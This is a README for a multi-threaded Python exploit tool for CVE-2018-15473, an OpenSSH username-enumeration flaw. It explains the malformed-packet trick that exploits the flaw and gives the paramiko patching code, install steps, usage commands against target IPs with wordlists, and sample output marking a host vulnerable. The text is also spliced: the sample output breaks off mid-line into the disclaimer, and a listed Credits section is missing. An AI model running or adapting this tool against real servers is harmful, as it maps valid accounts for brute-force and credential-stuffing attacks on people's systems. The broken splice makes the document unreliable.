Share
## https://sploitus.com/exploit?id=FEF0EB06-770B-5ADF-857C-1704B7AC3FE4
# CVE-2018-15473 โ€” SSH Username Enumeration Tool

> A Python 3 reimplementation of the classic CVE-2018-15473 OpenSSH user enumeration exploit, extended with multi-threading, wordlist support, automatic vulnerability detection, and thread-safe exploit patching.

---

## Table of Contents

- [About the Vulnerability](#about-the-vulnerability)
- [How the Exploit Works](#how-the-exploit-works)
- [Features](#features)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Examples](#examples)
- [Credits & Original Research](#credits--original-research)
- [Disclaimer](#disclaimer)

---

## About the Vulnerability

**CVE-2018-15473** is a user enumeration vulnerability affecting OpenSSH versions **2.3 through 7.7**.

The vulnerability arises from a subtle difference in how the OpenSSH server responds to authentication attempts for **valid** vs **invalid** usernames. By crafting a malformed public-key authentication packet, an attacker can observe the server's behavior and determine whether a given username exists on the system โ€” without needing to know the user's password.

This information can be a critical first step in a targeted brute-force or credential-stuffing attack.

| Detail | Value |
|---|---|
| CVE ID | CVE-2018-15473 |
| Affected Versions | OpenSSH 2.3 โ€“ 7.7 |
| CVSS Score | 5.3 (Medium) |
| Type | Information Disclosure / User Enumeration |
| Authentication Required | No |

---

## How the Exploit Works

OpenSSH's authentication flow normally works like this:

```
Client โ†’ MSG_SERVICE_REQUEST  โ†’ Server
Client โ† MSG_SERVICE_ACCEPT   โ† Server
Client โ†’ MSG_USERAUTH_REQUEST โ†’ Server
Client โ† MSG_USERAUTH_FAILURE or MSG_USERAUTH_SUCCESS โ† Server
```

The exploit abuses the `MSG_SERVICE_ACCEPT` stage. When the server sends back a `MSG_SERVICE_ACCEPT`, the client is supposed to append a boolean field to the subsequent `MSG_USERAUTH_REQUEST` packet. By **patching paramiko's `Message.add_boolean` method to a no-op**, the tool sends a **malformed/truncated auth packet**.

The OpenSSH server then behaves differently depending on whether the username exists:

- **Invalid username** โ†’ Server rejects with `MSG_USERAUTH_FAILURE` immediately (username doesn't exist, no point checking the key)
- **Valid username** โ†’ Server raises an `AuthenticationException` (it tried to verify the key, confirming the user exists)

This tool intercepts those two responses via patched paramiko handlers (`_parse_userauth_failure` and `_parse_service_accept`) and classifies each username accordingly.

### Thread-Safety Fix

The original PoC patches `add_boolean` **permanently**, which causes a race condition when multiple threads run simultaneously โ€” threads interfere with each other's handshakes, producing false `SSH negotiation failed` errors. This reimplementation wraps the patch in a `threading.Lock()`, making the swap atomic:

```python
with _patch_lock:
    real_add_boolean = paramiko.message.Message.add_boolean
    paramiko.message.Message.add_boolean = _add_boolean_noop
    try:
        result = original_service_accept(auth_handler, m)
    finally:
        paramiko.message.Message.add_boolean = real_add_boolean
```

---

## Features

- **Single username check** โ€” quick one-shot mode
- **Wordlist mode** โ€” enumerate a full list of usernames
- **Multi-threaded** โ€” configurable thread count, all thread-safe
- **Auto vulnerability detection** โ€” uses `nmap` to verify the target is running a vulnerable OpenSSH version before scanning
- **Deduplication** โ€” removes duplicate usernames from wordlists automatically
- **Clean output** โ€” color-coded results with a summary report

---

## Requirements

- Python 3.8+
- `paramiko`
- `python-nmap`
- `nmap` (system binary, must be installed)

---

## Installation

```bash
git clone https://github.com/yourusername/CVE-2018-15473.git
cd CVE-2018-15473

# Create and activate a virtual environment (recommended)
python3 -m venv venv
source venv/bin/activate

# Install dependencies
pip install paramiko python-nmap
```

Make sure `nmap` is installed on your system:

```bash
# Debian/Ubuntu/Kali
sudo apt install nmap
```

---

## Usage

```
usage: main.py [-h] [-p PORT] [-t THREADS] (-u USERNAME | -U WORDLIST) target

positional arguments:
  target                Target IP address

options:
  -h, --help            show this help message and exit
  -p, --port PORT       SSH port (default: 22)
  -t, --threads THREADS Threads for wordlist mode (default: 3)
  -u USERNAME           Single username to check
  -U WORDLIST           Path to wordlist file
```

---

## Examples

**Check a single username:**
```bash
python main.py 192.168.1.10 -u root
```

**Enumerate a wordlist with default threads:**
```bash
python main.py 192.168.1.10 -U /usr/share/wordlists/users.txt
```

**Enumerate with a custom thread count and port:**
```bash
python main.py 192.168.1.10 -U users.txt -t 10 -p 2222
```

**Sample output:**
```
[*] Scanning 192.168.56.109:22 ...
[*] Target running OpenSSH version: 4.7
[+] Target is VULNERABLE to CVE-2018-15473

[*] Loaded   : 12 usernames (0 duplicate(s) removed โ†’ 12 unique)
[*] Target   : 192.168.56.109:22
[*] Threads  : 10

  [+] root      This tool is intended **for educational purposes and authorized penetration testing only**.  
> Using this tool against systems you do not own or have explicit written permission to test is **illegal** and **unethical**.  
> The author takes no responsibility for any misuse of this software.  
> Always practice responsible disclosure.